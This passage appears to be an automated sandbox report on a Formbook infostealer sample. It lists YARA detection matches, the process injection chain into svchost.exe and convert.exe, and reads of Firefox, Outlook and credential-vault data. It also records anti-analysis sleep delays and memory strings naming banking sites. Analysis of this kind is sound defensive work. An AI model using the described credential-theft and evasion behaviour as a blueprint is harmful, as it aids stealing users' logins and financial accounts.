            Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087A2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00868713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00868CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0087B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_0088F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_008886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00814FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | File created: C:\Users\user\AppData\Local\Temp\aut8EC1.tmp
            Source: hkLFB22XxS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: convert.exe, 00000008.00000002.4573809328.0000000002983000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2745838231.0000000002963000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2745949723.0000000002983000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2747956351.000000000298E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: hkLFB22XxS.exe | ReversingLabs: Detection: 67%
            Source: unknown | Process created: C:\Users\user\Desktop\hkLFB22XxS.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
            Source: C:\Windows\SysWOW64\convert.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: ifsutil.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: scecli.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: osuninst.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: devobj.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\convert.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\convert.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\convert.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: hkLFB22XxS.exeStatic file information: File size 1233920 > 1048576
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: convert.pdb source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493538091.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4570865384.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: convert.pdbGCTL source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
            Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: hkLFB22XxS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088C304 LoadLibraryA,GetProcAddress, 1_2_0088C304
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00838B85 push ecx; ret 1_2_00838B98
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004144AD push eax; ret 2_2_004144C5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407823 push D4BE487Bh; retf 2_2_00407829
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004142D1 push ecx; ret 2_2_004142D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D290 push edx; ret 2_2_0040D2CB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004073A5 push esi; retf 2_2_004073A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C4A3 push edi; ret 2_2_0042C4AC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403570 push eax; ret 2_2_00403572
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418708 push ecx; retn 7131h 2_2_00418703
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004077D2 push eax; ret 2_2_004077D8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417792 pushad ; retf 2_2_004177AB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F0283D push eax; iretd 2_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx 2_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F01368 push eax; iretd 2_2_02F01369
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB225F pushad ; ret 8_2_02DB27F9
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB27FA pushad ; ret 8_2_02DB27F9
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB283D push eax; iretd 8_2_02DB2858
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DE09AD push ecx; mov dword ptr [esp], ecx 8_2_02DE09B6
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DB1368 push eax; iretd 8_2_02DB1369
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00230000 push ebp; ret 8_2_00230005
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024421F pushad ; retf 8_2_00244238
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0023425F push eax; ret 8_2_00234265
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_002342B0 push D4BE487Bh; retf 8_2_002342B6
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00240D5E push ecx; ret 8_2_00240D61
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00258F30 push edi; ret 8_2_00258F39
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00240F3A push eax; ret 8_2_00240F52
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024B66D push ecx; iretd 8_2_0024B66E
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024F8F5 push esp; ret 8_2_0024F8F9
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00247AB0 push esi; retf 8_2_00247ABA
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00814A35
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_008955FD
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_008333C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\hkLFB22XxS.exe API/Special instruction interceptor: Address: 24431F4
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\convert.exe Window / User API: threadDelayed 5778
            Source: C:\Windows\SysWOW64\convert.exe Window / User API: threadDelayed 4194
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_1-99391
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\convert.exe API coverage: 2.5 %
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep count: 5778 > 30
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep time: -11556000s >= -30000s
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep count: 4194 > 30
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep time: -8388000s >= -30000s
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep time: -38000s >= -30000s
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep time: -51000s >= -30000s
            Source: C:\Windows\SysWOW64\convert.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\convert.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00874696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00874696
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0087C9C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087C93C FindFirstFileW,FindClose, 1_2_0087C93C
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F200
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F35D
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087F65E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00873A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873A2B
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00873D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873D4E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087BF27
            Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024BB30 FindFirstFileW,FindNextFileW,FindClose, 8_2_0024BB30
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00814AFE
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: -16743.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: -16743.8.dr Binary or memory string: discord.comVMware20,11696487552f
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.comVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: omVMware20,11696487552|UE
